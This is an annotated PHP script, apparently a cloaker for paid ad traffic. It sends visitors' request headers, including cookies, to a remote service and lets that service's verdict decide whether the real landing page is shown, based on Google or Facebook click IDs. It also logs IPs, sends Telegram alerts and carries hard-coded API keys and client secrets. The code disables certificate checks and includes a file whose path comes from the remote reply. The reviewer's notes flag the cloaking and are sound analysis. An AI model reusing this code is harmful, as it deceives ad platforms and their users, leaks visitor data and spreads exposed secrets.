$max_length) {
            // NOTE(review): this listing begins part-way through a function whose signature is
            // not visible. The visible tail flushes the chunk built so far once the length
            // limit is hit, then starts a new one.
            $chunks[] = $current_chunk;
            $current_chunk = "";
        }
        $current_chunk .= $line . "\n";
    }
    // Keep the last, partially filled chunk.
    if (!empty($current_chunk)) {
        $chunks[] = $current_chunk;
    }
    // One Telegram Bot API sendMessage call per chunk. TELEGRAM_TOKEN and TELEGRAM_CHATID are
    // constants defined outside this listing; the token is part of the request URL.
    foreach ($chunks as $chunk) {
        $ch = curl_init();
        curl_setopt_array(
            $ch,
            array(
                CURLOPT_URL => 'https://api.telegram.org/bot' . TELEGRAM_TOKEN . '/sendMessage',
                CURLOPT_POST => TRUE,
                CURLOPT_RETURNTRANSFER => TRUE,
                CURLOPT_TIMEOUT => 10,
                CURLOPT_POSTFIELDS => array(
                    'chat_id' => TELEGRAM_CHATID,
                    'text' => $chunk,
                    // The text is sent with HTML parse mode; nothing visible here escapes it.
                    'parse_mode' => 'HTML'
                ),
            )
        );
        // The result is discarded and the handle is not closed in the visible code.
        curl_exec($ch);
    }
}

// Client address used for logging, the per-IP counter and the geo lookup.
// HTTP_CF_CONNECTING_IP and HTTP_X_FORWARDED_FOR are taken from request headers, so unless a
// trusted front proxy overwrites them the value is whatever the client sent; only REMOTE_ADDR
// is the socket peer. X-Forwarded-For may also carry a comma-separated list, which is used
// here unparsed. Reading a key that is absent raises an undefined-index notice/warning.
$request_ip = $_SERVER["HTTP_CF_CONNECTING_IP"] ? $_SERVER["HTTP_CF_CONNECTING_IP"] : (
    $_SERVER["HTTP_X_FORWARDED_FOR"] ? $_SERVER["HTTP_X_FORWARDED_FOR"] : $_SERVER["REMOTE_ADDR"]
);

/**
 * Asks pro.ip-api.com for the country of the global $request_ip.
 *
 * @return string lower-cased 'countryCode' field of the decoded reply
 */
function getCountryByIp() {
    global $request_ip;
    // $request_ip is concatenated into the URL without validation or encoding, and the API key
    // is a literal in source that travels in the query string.
    $curl = curl_init('https://pro.ip-api.com/json/' . $request_ip . '?key=0YoFQAK1tdsBe1Y');
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
    // Certificate verification is switched off for this HTTPS request, so the peer's identity
    // is not checked.
    curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($curl, CURLOPT_HEADER, false);
    // No check of the transfer result: on failure curl_exec() returns false and $response is
    // not an array when it is indexed below.
    $response = json_decode(curl_exec($curl), true);
    curl_close($curl);
    return strtolower($response['countryCode']);
}

/**
 * Appends one record about the current request to assets/php/log.json.
 *
 * @param mixed $type stored under 'type' (this file passes 'frod', 'redirect' and 'white')
 * @param mixed $etc  stored under 'check'
 * @return void
 */
function logClick($type, $etc) {
    global $request_ip;
    // Relative path, resolved against the process working directory.
    // NOTE(review): if that directory is served by the web server, the log (IPs, query strings,
    // referers) could be fetched directly - confirm the access rules for assets/php/.
    $logFile = 'assets/php/log.json';
    $timestamp = date('Y-m-d H:i:s');
    $ip = $request_ip;
    // Every logged click triggers an outbound geo lookup.
    $country = getCountryByIp();
    $clickData = [
        'timestamp' => $timestamp,
        'country' => $country,
        'ip' => $ip,
        'type' => $type,
        'check' => $etc,
        // Full query string and referer are stored as received; HTTP_REFERER is read without
        // an isset() check.
        'utms' => http_build_query($_GET),
        'referer' => $_SERVER['HTTP_REFERER']
    ];
    $existingData = [];
    if (file_exists($logFile)) {
        $jsonContent = file_get_contents($logFile);
        if ($jsonContent) {
            $existingData = json_decode($jsonContent, true);
        }
    }
    $existingData[] = $clickData;
    // Read-modify-write of the whole file with no lock visible: concurrent requests can drop
    // each other's entries. Nothing here trims the file, so it grows with every click.
    file_put_contents($logFile, json_encode($existingData, JSON_PRETTY_PRINT));
}

/**
 * Counts log entries for $ip whose timestamp falls within the last 86400 seconds.
 *
 * Despite the name this is a rolling 24-hour window, not the calendar day.
 *
 * @param string $ip address compared strictly against each entry's 'ip'
 * @return int|null the count; null (implicit) when the log file does not exist
 */
function countClicksByIpForToday($ip) {
    $logFile = 'assets/php/log.json';
    if (file_exists($logFile)) {
        $clickCount = 0;
        $jsonContent = file_get_contents($logFile);
        // json_decode() yields null for an empty or malformed file; the foreach below does not
        // guard against that.
        $existingData = json_decode($jsonContent, true);
        $currentTime = time();
        $oneDayAgo = $currentTime - 86400;
        foreach ($existingData as $entry) {
            $clickTime = strtotime($entry['timestamp']);
            if ($entry['ip'] === $ip && $clickTime >= $oneDayAgo) {
                $clickCount++;
            }
        }
        return $clickCount;
    }
}

// Per-address threshold: at 10 or more logged entries in the window the request is recorded
// as 'frod' and the script stops before any page is served. The key is $request_ip, which may
// come from a client-supplied header (see its assignment).
if (countClicksByIpForToday($request_ip) >= 10) {
    $logFile = 'assets/php/log.json';
    $jsonContent = file_get_contents($logFile);
    $existingData = json_decode($jsonContent, true);
    // After the loop $type holds the 'type' of the last entry for this address; it stays
    // undefined if no entry matches.
    foreach ($existingData as $entry) {
        if ($entry['ip'] === $request_ip) {
            $type = $entry['type'];
        }
    }
    // Notify only the first time: once the latest entry is already 'frod' the alert is skipped.
    if ($type != 'frod') {
        // The "domain" is derived from the working directory by removing a fixed hosting prefix.
        $current_domain = getcwd();
        $current_domain = str_replace("/var/www/www-root/data/www/", "",$current_domain);
        // A SERVER_NAME that differs from the directory name is labelled "BOT".
        // NOTE(review): SERVER_NAME can follow the request's Host header depending on the web
        // server configuration - confirm before trusting this comparison.
        if ($current_domain === $_SERVER['SERVER_NAME']) {
            $is_bot = '';
        } else {
            $is_bot = " BOT: {$_SERVER['SERVER_NAME']}";
        }
        // Request-derived values are interpolated unescaped.
        // NOTE(review): message_to_telegram is presumably the function whose tail opens this
        // listing (it sends with HTML parse mode) - TODO confirm.
        $message = "⚠️ FROD: {$current_domain} IP: ".$request_ip.$is_bot;
        message_to_telegram("{$message}");
        $data = [
            'timestamp' => date('Y-m-d H:i:s'),
            'domain' => $current_domain,
            'ip' => $request_ip
        ];
        // Second report of the same event to an external endpoint; the response is not used.
        $target_url = 'https://true-vista.com/dev/statuses/frod.php';
        $ch = curl_init();
        curl_setopt_array($ch, [
            CURLOPT_URL => $target_url,
            CURLOPT_POST => true,
            CURLOPT_RETURNTRANSFER => true,
            CURLOPT_TIMEOUT => 10,
            CURLOPT_POSTFIELDS => http_build_query($data)
        ]);
        $response = curl_exec($ch);
        curl_close($ch);
    }
    logClick('frod', 'frod');
    exit;
}

// Any origin is allowed to read responses from this script.
header('Access-Control-Allow-Origin: *');
// The class is declared below this call in the file. $isTarget is not read again in the
// visible part of the file.
$isTarget = (new RequestHandlerClient())->run();

/**
 * Sends a description of the current request to a remote decision service and then acts on
 * the reply: include a local PHP file, redirect, render an iframe or echo returned content.
 *
 * NOTE(review): serving different local pages ('page.php' vs 'main.php') depending on a remote
 * verdict and on ad click-id parameters, with outcomes logged as 'redirect' / 'white', is
 * consistent with traffic cloaking. The outbound hosts named in this file are useful pivots
 * when reviewing egress logs.
 */
class RequestHandlerClient
{
    const SERVER_URL = 'https://rbl.palladium.expert';

    /**
     * Entry point: collects request data, attaches a hard-coded credential set and posts
     * everything to SERVER_URL through curlSend().
     *
     * @return bool|null value returned by curlSend(); null on the early dr_jsess return.
     *                   Most reply modes end in exit and never return here.
     */
    public function run()
    {
        // Requests carrying dr_jsess=1 (loose comparison) get a bare 200 and no processing.
        if (!empty($_GET) && isset($_GET['dr_jsess']) && $_GET['dr_jsess'] == 1) {
            header("HTTP/1.1 200 OK");
            return;
        }

        $headers = [];
        $headers['request'] = $this->collectRequestData();
        $headers['jsrequest'] = $this->collectJsRequestData();
        $headers['server'] = $this->collectHeaders();

        // Without a 'ckey' parameter the first UTMS entry of a local JSON file replaces the
        // visitor's parameters, both in $_GET and in the QUERY_STRING reported upstream.
        if (empty($_GET['ckey'])) {
            $jsonFile = 'assets/php/utms.json';
            if (file_exists($jsonFile)) {
                $jsonString = file_get_contents($jsonFile);
                $data = json_decode($jsonString, true);
                $utmParams = $data['UTMS'][0];
                $queryString = '';
                foreach ($utmParams as $key => $value) {
                    // Values are URL-encoded, keys are not; the encoded form is also what is
                    // written back into $_GET.
                    $queryString .= $key . '=' . urlencode($value) . '&';
                    $_GET[$key] = urlencode($value);
                }
                $_GET['from'] = 'json';
                $queryString = rtrim($queryString, '&');
                $headers['server']['QUERY_STRING'] = $queryString;
            }
        }

        // The reported HTTP_HOST and the credential set depend on sub3/sub5. Both keys are read
        // without isset(), and in_array() compares loosely here.
        // NOTE(review): client id, company token and secret are literals in source; anyone who
        // can read this file has them, so they should be treated as exposed.
        if (in_array($_GET['sub3'], ['ID58', 'ID59', 'ID10', 'ID65']) && $_GET['sub5'] === 'empty') {
            $headers['server']['HTTP_HOST'] = 'everglloww.com';
            $headers['auth']['clientId'] = 3767;
            $headers['auth']['clientCompany'] = "5ZPhXri3nq7ufmt64w4x";
            $headers['auth']['clientSecret'] = "Mzc2NzVaUGhYcmkzbnE3dWZtdDY0dzR4Y2U2NmY2ZTZmOWRlZjUxMGFjNDBiYTJlNjVjMmFjZGEwMTQyZmZhZQ==";
            $headers['server']['bannerSource'] = 'adwords';
        } else {
            $headers['server']['HTTP_HOST'] = 'visioncodexup.com';
            $headers['auth']['clientId'] = 3767;
            $headers['auth']['clientCompany'] = "uiDWQ8ffn8nYkFQcYLhi";
            $headers['auth']['clientSecret'] = "Mzc2N3VpRFdROGZmbjhuWWtGUWNZTGhpY2U2NmY2ZTZmOWRlZjUxMGFjNDBiYTJlNjVjMmFjZGEwMTQyZmZhZQ==";
            $headers['server']['bannerSource'] = 'adwords';
        }

        return $this->curlSend($headers);
    }

    /**
     * POSTs the collected data to SERVER_URL and hands a decoded JSON reply to
     * handleServerReply().
     *
     * @param array $params nested array, flattened with http_build_query()
     *
     * @return bool value returned by handleServerReply(). On a failed transfer, a non-200
     *              status or a non-array reply, getDefaultAnswer() emits a 500 page and exits,
     *              so the final return statement is not reached.
     */
    public function curlSend(array $params)
    {
        $answer = false;
        $curl = curl_init(self::SERVER_URL);
        if ($curl) {
            curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
            // Both certificate checks are disabled, so the HTTPS peer is not authenticated.
            // The reply decides which file is included, where the visitor is redirected and
            // what is echoed (see handleServerReply), so this weakens every one of those steps.
            curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
            curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false);
            curl_setopt($curl, CURLOPT_POST, true);
            curl_setopt($curl, CURLOPT_POSTFIELDS, http_build_query($params));
            curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 3);
            // The overall timeout is set twice, in seconds and in milliseconds.
            curl_setopt($curl, CURLOPT_TIMEOUT, 4);
            curl_setopt($curl, CURLOPT_TIMEOUT_MS, 4000);
            curl_setopt($curl, CURLOPT_FORBID_REUSE, true);

            $result = curl_exec($curl);
            if ($result) {
                $serverOut = json_decode(
                    $result,
                    true
                );
                $status = curl_getinfo($curl, CURLINFO_HTTP_CODE);
                if ($status == 200 && is_array($serverOut)) {
                    $answer = $this->handleServerReply($serverOut);
                    return $answer;
                }
            }
        }

        $this->getDefaultAnswer();
        return $answer;
    }

    /**
     * Acts on the remote reply. Every action below is chosen by fields of $reply
     * ('result', 'mode', 'target', 'content'); none of them is validated locally.
     *
     * @param array $reply decoded JSON reply from SERVER_URL
     *
     * @return bool the reply's 'result' cast to bool, when no branch has called exit
     */
    protected function handleServerReply($reply)
    {
        // 'result' is read without isset().
        $result = (bool) ($reply['result'] ? $reply['result'] : 0);

        if (
            isset($reply['mode']) &&
            (
                (isset($reply['target'])) ||
                (isset($reply['content']) && !empty($reply['content']))
            )
        ) {
            // Only one of 'target' / 'content' has to be present, but both are read here.
            $target = $reply['target'];
            $mode = $reply['mode'];
            $content = $reply['content'];

            if (preg_match('/^https?:/i', $target) && $mode == 3) {
                // do fallback to mode2
                $mode = 2;
            }

            // A non-empty 'landing' parameter overrides the verdict: page.php is included
            // regardless of 'result' and 'mode', after $_GET has been replaced by the query
            // string of the target.
            if (!empty($_GET) && isset($_GET['landing']) && $_GET['landing'] != '') {
                $result = 1;
                $target = parse_url($target);
                if (isset($target['query'])) {
                    parse_str($target['query'], $_GET);
                }
                $target['path'] = 'page.php';
                require_once $this->sanitizePath($target['path']);
                exit;
            }

            if ($result && $mode == 1) {
                // Mode 1: output built around the target by displayIFrame().
                $this->displayIFrame($target);
                exit;
            } elseif ($result && $mode == 2) {
                // Mode 2: redirect to a location taken verbatim from the reply.
                header("Location: {$target}");
                exit;
            } elseif ($result && $mode == 3) {
                // Mode 3: include a local PHP file named by the reply.
                $target = parse_url($target);
                if (isset($target['query'])) {
                    // $_GET is overwritten with the target's query parameters.
                    parse_str($target['query'], $_GET);
                }
                $this->hideFormNotification();
                if ($target['path'] === 'page.php') {
                    // page.php is included only when an ad click identifier is present, or
                    // 'native' is set together with the listed referer host or equals 'geozo'.
                    if (
                        isset($_GET['gclid']) ||
                        isset($_GET['wbraid']) ||
                        isset($_GET['gbraid']) ||
                        isset($_GET['fbclid']) ||
                        (
                            isset($_GET['native']) &&
                            isset($_SERVER['HTTP_REFERER']) &&
                            parse_url($_SERVER['HTTP_REFERER'], PHP_URL_HOST) === 'clck.mgid.com'
                        ) ||
                        (
                            isset($_GET['native']) &&
                            $_GET['native'] === 'geozo'
                        )
                    ) {
                        logClick('redirect', 'valid');
                        require_once $this->sanitizePath($target['path']);
                        exit;
                    } else {
                        // No identifier: main.php is included instead.
                        logClick('white', 'no_clid');
                        $target['path'] = 'main.php';
                        require_once $this->sanitizePath($target['path']);
                        exit;
                    }
                } else {
                    // Any other path from the reply is joined onto __DIR__ and executed as PHP.
                    // sanitizePath() does not restrict which file that can be.
                    logClick('white', 'invalid');
                    require_once $this->sanitizePath($target['path']);
                    exit;
                }
            } elseif ($result && $mode == 4) {
                // Mode 4: the reply's content is written to the response unescaped.
                echo $content;
                exit;
            } else if (!$result && $mode == 5) {
                // Intentionally empty: falls through to the return below.
            } elseif ($mode == 6) {
                // Intentionally empty: falls through to the return below.
            } else {
                // Reached for modes 1-4 with a false result and for any other mode value.
                logClick('white', 'proxy_vpn');
                $path = $this->sanitizePath($target);
                // NOTE(review): isLocal() is given the path after __DIR__ was prefixed, so it
                // looks like it always sees a filesystem path rather than a URL - confirm
                // whether the 404 branch can be taken at all.
                if (!$this->isLocal($path)) {
                    // NOTE(review): the literal below contains a line break in this listing and
                    // PHP's header() rejects values containing a newline; check the deployed
                    // file to see whether the break is an artefact of how the listing was
                    // wrapped.
                    header("404 Not 
Found", true, 404);
                } else {
                    $this->hideFormNotification();
                    require_once $path;
                }
                exit;
            }
        }

        return $result;
    }

    /**
     * Echoes a string literal that is empty in this listing.
     * NOTE(review): markup may have been stripped from the literals when the page was
     * extracted - compare with the deployed file.
     *
     * @return void
     */
    private function hideFormNotification()
    {
        echo "";
        //echo "";
    }

    /**
     * Echoes output for reply mode 1. $target is passed through htmlspecialchars() but does not
     * appear in the echoed expression as shown here (see the note on stripped markup in
     * hideFormNotification()).
     *
     * @param string $target target taken from the remote reply
     * @return void
     */
    private function displayIFrame($target)
    {
        $target = htmlspecialchars($target);
        // hideFormNotification() returns nothing; it echoes while this expression is evaluated.
        echo " " . $this->hideFormNotification() . " ";
    }

    /**
     * Prefixes $path with __DIR__, adding a '/' when $path does not start with one.
     *
     * Despite the name, nothing is filtered: '..' segments and any other characters pass
     * through unchanged. An empty $path is not handled before $path[0] is read.
     *
     * @param string $path
     * @return string
     */
    private function sanitizePath($path)
    {
        if ($path[0] !== '/') {
            $path = __DIR__ . '/' . $path;
        } else {
            $path = __DIR__ . $path;
        }

        return $path;
    }

    /**
     * Reports whether parse_url() finds no scheme or no host in $path.
     *
     * @param string $path
     * @return bool true when either component is missing
     */
    private function isLocal($path)
    {
        // do not validate url via filter_var
        $url = parse_url($path);

        if (!isset($url['scheme']) || !isset($url['host'])) {
            return true;
        } else {
            return false;
        }
    }

    /**
     * Copies selected $_SERVER entries: the keys listed in $userParams plus every key that
     * starts with 'HTTP'.
     *
     * The 'HTTP' prefix rule includes all request headers, e.g. HTTP_COOKIE and
     * HTTP_AUTHORIZATION when present, and run() posts the result to SERVER_URL.
     *
     * @return array
     */
    protected function collectHeaders()
    {
        // NOTE(review): PHP exposes request headers as HTTP_* keys, so entries such as
        // 'X-Forwarded-Host' presumably never match a $_SERVER key - verify.
        $userParams = [
            'REMOTE_ADDR',
            'SERVER_PROTOCOL',
            'SERVER_PORT',
            'REMOTE_PORT',
            'QUERY_STRING',
            'REQUEST_SCHEME',
            'REQUEST_URI',
            'REQUEST_TIME_FLOAT',
            'X_FB_HTTP_ENGINE',
            'X_PURPOSE',
            'X_FORWARDED_FOR',
            'X_WAP_PROFILE',
            'X-Forwarded-Host',
            'X-Forwarded-For',
            'X-Frame-Options',
        ];

        $headers = [];
        foreach ($_SERVER as $key => $value) {
            // substr_compare() here tests whether the first four characters of $key are 'HTTP'.
            if (in_array($key, $userParams) || substr_compare('HTTP', $key, 0, 4) == 0) {
                $headers[$key] = $value;
            }
        }

        return $headers;
    }

    /**
     * Decodes the JSON in $_POST['data'] and adds $_POST['crossref_sessionid'] under
     * 'cr-session-id' when present.
     *
     * NOTE(review): json_decode() may return null or a scalar, while the declared return type
     * is array - confirm how malformed input is expected to behave.
     *
     * @return array
     */
    private function collectRequestData(): array
    {
        $data = [];
        if (!empty($_POST)) {
            if (!empty($_POST['data'])) {
                $data = json_decode($_POST['data'], true);
                // Second attempt for input that arrived with escaped quotes.
                if (JSON_ERROR_NONE !== json_last_error()) {
                    $data = json_decode(
                        stripslashes($_POST['data']),
                        true
                    );
                }
                // Only the $_REQUEST copy is removed; $_POST['data'] stays set.
                unset($_REQUEST['data']);
            }

            if (!empty($_POST['crossref_sessionid'])) {
                $data['cr-session-id'] = $_POST['crossref_sessionid'];
                unset($_POST['crossref_sessionid']);
            }
        }

        return $data;
    }

    /**
     * Decodes the JSON in $_POST['jsdata'], with the same stripslashes() retry as
     * collectRequestData().
     *
     * NOTE(review): the decoded value is returned as-is although the declared type is array.
     *
     * @return array
     */
    public function collectJsRequestData(): array
    {
        $data = [];
        if (!empty($_POST)) {
            if (!empty($_POST['jsdata'])) {
                $data = json_decode($_POST['jsdata'], true);
                if (JSON_ERROR_NONE !== json_last_error()) {
                    $data = json_decode(
                        stripslashes($_POST['jsdata']),
                        true
                    );
                }
                // Only the $_REQUEST copy is removed; $_POST['jsdata'] stays set.
                unset($_REQUEST['jsdata']);
            }
        }

        return $data;
    }

    /**
     * Fallback used by curlSend() when no usable reply was obtained: sends a 500 status,
     * prints a plain error body and ends the script.
     *
     * Never returns to the caller, because it always calls exit.
     *
     * @return void
     */
    private function getDefaultAnswer()
    {
        header($_SERVER["SERVER_PROTOCOL"] . ' 500 Internal Server Error', true, 500);
        // NOTE(review): the body below shows no markup in this listing; tags were presumably
        // lost in extraction - compare with the deployed file.
        echo "

500 Internal Server Error

The request was unsuccessful due to an unexpected condition encountered by the server.

";
        exit;
    }
}